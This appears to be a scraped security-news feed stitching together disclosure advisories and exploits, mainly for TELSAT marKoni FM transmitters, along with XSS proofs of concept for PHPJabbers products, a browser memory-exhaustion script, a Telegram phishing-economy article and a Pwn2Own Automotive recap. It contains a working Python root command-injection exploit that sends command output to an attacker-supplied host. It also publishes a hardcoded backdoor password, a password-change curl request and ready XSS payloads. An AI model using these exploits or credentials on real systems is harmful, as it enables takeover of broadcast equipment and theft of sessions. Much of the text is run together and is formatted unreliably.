TELSAT marKoni FM Transmitter version 1.9.5 allows an unauthorized user to change passwords.

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change  
his/her password, potentially gaining unauthorized access to sensitive  
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5811  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php

10.11.2023

--

PoC request of a user changing his own password.  
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \  
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t

HTTP/1.1 200 OK  
Content-type: text/html  
Cache-control: no-cache  
Set-Cookie: name=user-1702119917; max-age=315360000  
Transfer-Encoding: chunked  
Date: Sat, 9 Dec 2023 11:05:17 GMT  
Server: lighttpd/1.4.33

oc=4&resp=0

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control

TELSAT marKoni FM Transmitter version 1.9.5 implements client-side restrictions that can be bypassed by editing the HTML source page that enable administrative operations.

  
TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: The application implements client-side restrictions that can  
be bypassed by editing the HTML source page that enable administrative  
operations.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5810  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5810.php

10.11.2023

--

These few JavaScript functions can be called directly in the browser's console  
and can enable a user to execute and apply modifications with admin rights.  
There are plenty more functions throughout the web application's interface.

set_wget()  
change_ip_settings()  
change_web_port()  
set_sendtime()  
add_mailaddress()  
set_mailinglist()  
...  
...

TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

TELSAT marKoni FM Transmitter version 1.9.5 has a hidden super administrative account factory that has the hardcoded password inokram25 that allows full access to the web management interface configuration.

    TELSAT marKoni FM Transmitter 1.9.5 Backdoor AccountVendor: TELSAT SrlProduct web page: https://www.markoni.itAffected version: Markoni-D (Compact) FM Transmitters                  Markoni-DH (Exciter+Amplifiers) FM Transmitters                  Markoni-A (Analogue Modulator) FM Transmitters                  Firmware: 1.9.5                            1.9.3                            1.5.9                            1.4.6                            1.3.9Summary: Professional FM transmitters.Desc: The transmitter has a hidden super administrative account 'factory'that has the hardcoded password 'inokram25' that allows full access tothe web management interface configuration. The factory account is notvisible in the users page of the application and the password cannot bechanged through any normal operation of the device. The backdoor lies inthe /js_files/LogIn_local.js script file. Attackers could exploit thisvulnerability by logging in using the backdoor credentials for the webpanel gaining also additional functionalities including: unit configuration,parameter modification, EEPROM overwrite, clearing DB, and factory logmodification.Tested on: GNU/Linux 3.10.53 (armv7l)           icorem6solox           lighttpd/1.4.33Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2024-5809Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.phpCWE ID: 912CWE URL: https://cwe.mitre.org/data/definitions/912.html10.11.2023--The credentials can be seen in the auto_login() JS function in theunprotected /js_files/LogIn_local.js file:$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"function auto_login() {     // @mod1    var username = "factory";    var password = "inokram25";$

TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account

TELSAT marKoni FM Transmitter version 1.9.5 is susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings' WAN IP info service, which utilizes the wget module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the url parameter in the HTTP GET request to ekafcgi.fcgi.

    #!/usr/bin/env python### TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit### Vendor: TELSAT Srl# Product web page: https://www.markoni.it# Affected version: Markoni-D (Compact) FM Transmitters#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters#                   Markoni-A (Analogue Modulator) FM Transmitters#                   Firmware: 1.9.5#                             1.9.3#                             1.5.9#                             1.4.6#                             1.3.9## Summary: Professional FM transmitters.## Desc: The marKoni FM transmitters are susceptible to unauthenticated# remote code execution with root privileges. An attacker can exploit# a command injection vulnerability by manipulating the Email settings'# WAN IP info service, which utilizes the 'wget' module. This allows# the attacker to gain unauthorized access to the system with administrative# privileges by exploiting the 'url' parameter in the HTTP GET request# to ekafcgi.fcgi.## -------------------------------------------------------------------------# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami# Authentication successful for backdoor# Injecting command: whoami# Listening on port 9999# ('10.0.8.3', 47302) called back# Received: root# Housekeeping...# Zya and thanks for stopping by!## [lqwrm@metalgear ~]# ## -------------------------------------------------------------------------## Tested on: GNU/Linux 3.10.53 (armv7l)#            icorem6solox#            lighttpd/1.4.33### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2024-5808# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php### 10.11.2023#from colorama import init, Foreimport re,os,sys,requestsimport socket,threadingfrom time import sleepinit()def just_listen_to_me(lport, cstop):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.bind(("0.0.0.0", lport))    s.listen(1)    print("Listening on port " + str(lport))    try:        conn, addr = s.accept()        print(addr, "called back")        cstop.set()    except socket.timeout:        print("Call return timeout\nCheck your ports")        conn.close()    while True:        try:            odg = conn.recv(1771).decode()            uam = re.search(r"User-Agent:\s*(.*)", odg)            if uam:                uav = uam.group(1)                print(f"Received: {uav}")                exit()            else:                print("No output for you")        except:            print("Housekeeping...")            exit()    s.close()def authenticate(ipaddr, option): #### Encrypted Shit ####_"    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"    if option == "user": ##################################"        username = "\x75\x73\x65\x72" #####################"        password = "\x75\x73\x65\x72" #####################"    elif option == "admin": ###############################"        username = "\x61\x64\x6D\x69\x6E" #################"        password = "\x61\x64\x6D\x69\x6E" #################"    elif option == "backdoor": ############################"        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"    authp = {        'username': username,        'password': password    }    resp = requests.get(auth_url + ep + "1", params=authp)    if "Set-Cookie" in resp.headers:        print(f"Authentication successful for {option}")        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]        return auth_cookie    else:        print(f"Authentication failed for {option}.")        print("Try a different option.")        return Nonedef execute(ipaddr, cookie, command, listen_ip):    print(f"Injecting command: {command}")    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"    dva = f"http://{ipaddr}{ep}27"    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"    headers = {"Cookie": cookie}    requests.get(eden, headers=headers)    sleep(2)    requests.get(dva, headers=headers)    sleep(2)    requests.get(tri, headers=headers)    sleep(1)    requests.get(clear, headers=headers)    print("Zya and thanks for stopping by!")    exit(0)def njaaah(text):    columns = os.get_terminal_size().columns    print(text.center(columns))zsl = "\033[91mWaddup!\033[0m" #Win64mrjox = f"""     ________   /          \\  /    ____    \\ |   /    0 \\   | |   \\______/   |   \\____________/  {zsl}       | |      /   \\     /  O  \\    |    O  \\    |       \\    |        \\    |_________|        """if len(sys.argv) != 5:    print()    print("This is a PoC script for the marKoni transmitters 0day")    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")    print("Option: 'user', 'admin', 'backdoor'")    print("Default listening port: 9999")    njaaah(mrjox)    exit()ipaddr = sys.argv[1]opt = sys.argv[2]listen_ip = sys.argv[3]command = sys.argv[4]opt_map = {    "admin"    : "admin",    "user"     : "user",    "backdoor" : "backdoor"}if opt in opt_map:    auth_cookie = authenticate(ipaddr, opt_map[opt])    if auth_cookie:        cstop = threading.Event()        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))        lt.start()        execute(ipaddr, auth_cookie, command, listen_ip)        cstop.set()        lt.join()else:    print("Invalid option.")

TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection

Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230.
"This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and

Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230.

"This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and well-oiled supply chain of tools and victims' data," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a new report.

"Free samples, tutorials, kits, even hackers-for-hire -- everything needed to construct a complete end-to-end malicious campaign."

This is not the first time the popular messaging platform has come under the radar for facilitating malicious activities, which are in part driven by its lenient moderation efforts.

As a result, what used to be available only on invite-only forums in the dark web is now readily accessible via public channels and groups, thereby opening the doors of cybercrime to aspiring and inexperienced cyber criminals.

In April 2023, Kaspersky revealed how phishers create Telegram channels to educate newbies about phishing as well as advertise bots that can automate the process of creating phishing pages for harvesting sensitive information such as login credentials.

One such malicious Telegram bot is Telekopye (aka Classiscam), which can craft fraudulent web pages, emails, SMS messages to help threat actors pull off large-scale phishing scams.

Guardio said the building blocks to construct a phishing campaign can be readily purchased off Telegram – "some offered at very low prices, and some even for free" – thereby making it possible to set up scam pages via a phishing kit, host the page on a compromised WordPress website via a web shell, and leverage a backdoor mailer to send the email messages.

Backdoor mailers, marketed on various Telegram groups, are PHP scripts injected into already infected-but-legitimate websites to send convincing emails using the legitimate domain of the exploited website to bypass spam filters.

"This situation highlights a dual responsibility for site owners," the researchers said. "They must safeguard not only their business interests but also protect against their platforms being used by scammers for hosting phishing operations, sending deceptive emails, and conducting other illicit activities, all unbeknownst to them."

To further increase the likelihood of success of such campaigns, digital marketplaces on Telegram also provide what's known as "letters," which are "expertly designed, branded templates" that make the email messages appear as authentic as possible to trick the victims into clicking on the bogus link pointing to the scam page.

Telegram is also host to bulk datasets containing valid and relevant email addresses and phone numbers to target. Referred to as "leads," they are sometimes "enriched" with personal information such as names and physical addresses to maximize the impact.

"These leads can be incredibly specific, tailored for any region, niche, demographic, specific company customers, and more," the researchers said. "Every piece of personal information adds to the effectiveness and credibility of these attacks."

The way these lead lists are prepared can vary from seller to seller. They can be procured either from cybercrime forums that sell data stolen from breached companies or through sketchy websites that urge visitors to complete a fake survey in order to win prizes.

Another crucial component of these phishing campaigns is a means to monetize the collected stolen credentials by selling them to other criminal groups in the form of "logs," netting the threat actors a 10-fold return on their investment based on the number of victims who end up providing valid details on the scam page.

"Social media account credentials are sold for as little as a dollar, while banking accounts and credit cards could be sold for hundreds of dollars — depending on their validity and funds," the researchers said.

"Unfortunately, with just a small investment, anyone can start a significant phishing operation, regardless of prior knowledge or connections in the criminal underworld."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Telegram Marketplaces Fuel Phishing Attacks with Easy-to-Use Kits and Malware

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

By Deeba Ahmed
Vendors have 90 days to release security patches before Trend Micro publicly discloses it.
This is a post from HackRead.com Read the original post: Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

Pwn2Own Automotive 2024 took place in Tokyo, Japan, from January 24 to 26.

Pwn2Own Automotive 2024, a three-day contest organized by Trend Micro’s Zero Day Initiative, saw competitors earn $1,323,750 for hacking Tesla twice and discovering 49 zero-day bugs in EV systems.

Synacktiv Team won the contest, earning $450,000 in cash for hacking a Tesla car twice, gaining root permissions, and demonstrating a sandbox escape in the Tesla infotainment system. They also demonstrated two-bug chains against Ubiquiti Connect and JuiceBox 40 Smart EV Stations. Second on the list was fuzzware.io for received $177,500. In third place were Midnight Blue/PHP Hooligans with $80,000 in rewards.

Participants earned over $700,000 on the first day, including $60,000 for EV charger hacks and $40,000 for infotainment system and Tesla modem hacks. The second day saw the Automotive Grade Linux exploit earning the biggest reward of $35,000, while EV charger exploits earned teams $30,000. On the third day, researchers received $60,000 for an Emporia EV charger exploit and $30,000 each for other exploits, resulting in payouts ranging from $20,000 to $26,000.

Here, are the prominent happenings and results from all three days of the contest.

On the first day, researchers discovered vulnerabilities in Tesla’s modem, Sony’s infotainment systems, and Alpine’s car audio players, collectively earning $722,500 in awards for identifying three bug collisions and 24 zero-day exploits.

The NCC Group EDG team won $70,000 for exploiting zero-day bugs to hack Pioneer DMH-WT7600NEX and Phoenix Contact CHARX SEC-3100 EV chargers. Sina Kheirkhah, Tobias Scharnowski, and Felix Buchmann attacked ChargePoint Home Flex and Sony XAV-AX5500, earning $60,000 and $40,000, respectively.

Synacktiv Team successfully exploited Tesla Modem and JuiceBox 40 Smart EV charging stations, while the PCAutomotive Team exploited Alpine Halo9 iLX-F509.

On Day 2, Team Tortuga successfully exploited a known bug in a 2-bug chain against the ChargePoint Home Flex, earning $5,000 and 3 Master of Pwn Points. The Midnight Blue / PHP Hooligans team also used a known bug in a 3-bug chain to exploit the Phoenix Contact CHARX SEC-3100, earning $30,000 and 6 Master of Pwn Points.

PCAutomotive couldn’t exploit the JuiceBox 40 Smart EV Charging Station whereas Katsuhiko Sato successfully attacked the Sony XAV-AX5500, earning $10,000 and 2 Master of Pwn Points.

Computest Sector 7 successfully targeted the JuiceBox 40 Smart EV Charging Station for a known bug, earning $15,000 and 3 Master of Pwn Points. Sina Kheirkhah failed to exploit the Autel MaxiCharger AC Wallbox Commercial, while Synacktiv and NCC Group EDG successfully exploited the Tesla Infotainment System and Alpine Halo9 iLX-F509, using a 2-bug chain, earning $100,000 and $20,000, respectively.

Synacktiv earned $35,000 and 5 Master of Pwn Points using a 3-bug chain, while Le Tran Hai Tung earned $20,000 and 4 Master of Pwn Points using a 2-bug chain. Sina Kheirkhah and Alex Olson failed to get their exploits working, while fuzzware.io earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow. RET2 Systems also earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow.

Day 3 saw Computest Sector 7 exploiting the ChargePoint Home Flex and earning $30,000 and 6 Master of Pwn Points using a 2-bug chain. Synacktiv successfully exploited the Sony XAV-AX5500, earning $20,000 and 4 Master of Pwn Points. Katsuhiko Sato failed to exploit the Pioneer DMH-WT7600NEX.

Sina Kheirkhah attacked the Ubiquiti Connect EV, earning $30,000 and 6 Master of Pwn Points. fuzzware.io exploited the Phoenix Contact CHARX SEC-3100, earning $22,500 and 4.5 Master of Pwn Points.

Nettitude’s Connor Ford exploited the JuiceBox 40 Smart EV Charging Station, using a stack-based buffer overflow, earning $30,000 and 6 Master of Pwn Points. Team Cluck exploited the Phoenix Contact CHARX SEC-3100, earning $26,250 and 5.25 Master of Pwn Points.

Vendors have 90 days to release security patches before Trend Micro publicly discloses it.

****_RELATED ARTICLES_****

1.  6 of the Best Crypto Bug Bounty Programs
2.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
3.  Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu Pwned

Tag

#php